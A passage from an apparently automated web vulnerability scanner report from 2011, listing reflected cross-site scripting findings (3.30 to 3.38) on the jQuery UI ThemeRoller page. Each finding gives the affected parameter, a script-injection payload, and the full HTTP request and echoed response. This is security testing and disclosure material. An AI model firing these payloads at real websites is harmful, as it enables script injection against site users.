Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100862b5"><script>alert(1)</script>264ef754561&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.30. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40148"><script>alert(1)</script>b76740fa911 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png40148"><script>alert(1)</script>b76740fa911&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png40148"><script>alert(1)</script>b76740fa911&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4
...[SNIP]...

3.31. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a15e"><script>alert(1)</script>81a0d838539 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png4a15e"><script>alert(1)</script>81a0d838539&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png4a15e"><script>alert(1)</script>81a0d838539&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF
...[SNIP]...

3.32. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe60a"><script>alert(1)</script>ce06652329f was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.pngfe60a"><script>alert(1)</script>ce06652329f&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.pngfe60a"><script>alert(1)</script>ce06652329f&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=
...[SNIP]...

3.33. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c40d0"><script>alert(1)</script>ec045cea2ed was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.pngc40d0"><script>alert(1)</script>ec045cea2ed&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.pngc40d0"><script>alert(1)</script>ec045cea2ed&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTex
...[SNIP]...

3.34. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d571"><script>alert(1)</script>b542d36e1a6 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png1d571"><script>alert(1)</script>b542d36e1a6&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
meroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png1d571"><script>alert(1)</script>b542d36e1a6&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666
...[SNIP]...

3.35. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb4d"><script>alert(1)</script>b1e44b09bce was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.pngabb4d"><script>alert(1)</script>b1e44b09bce&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.pngabb4d"><script>alert(1)</script>b1e44b09bce&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B
...[SNIP]...

3.36. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c782"><script>alert(1)</script>75def417c71 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png4c782"><script>alert(1)</script>75def417c71&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png4c782"><script>alert(1)</script>75def417c71&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC
...[SNIP]...

3.37. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac7dc"><script>alert(1)</script>ced59be90ca was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.pngac7dc"><script>alert(1)</script>ced59be90ca&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.pngac7dc"><script>alert(1)</script>ced59be90ca&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerR
...[SNIP]...

3.38. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa510"><script>alert(1)</script>0bdc0f1fe04 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.pngaa510"><script>alert(1)</script>0bdc0f1fe04&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
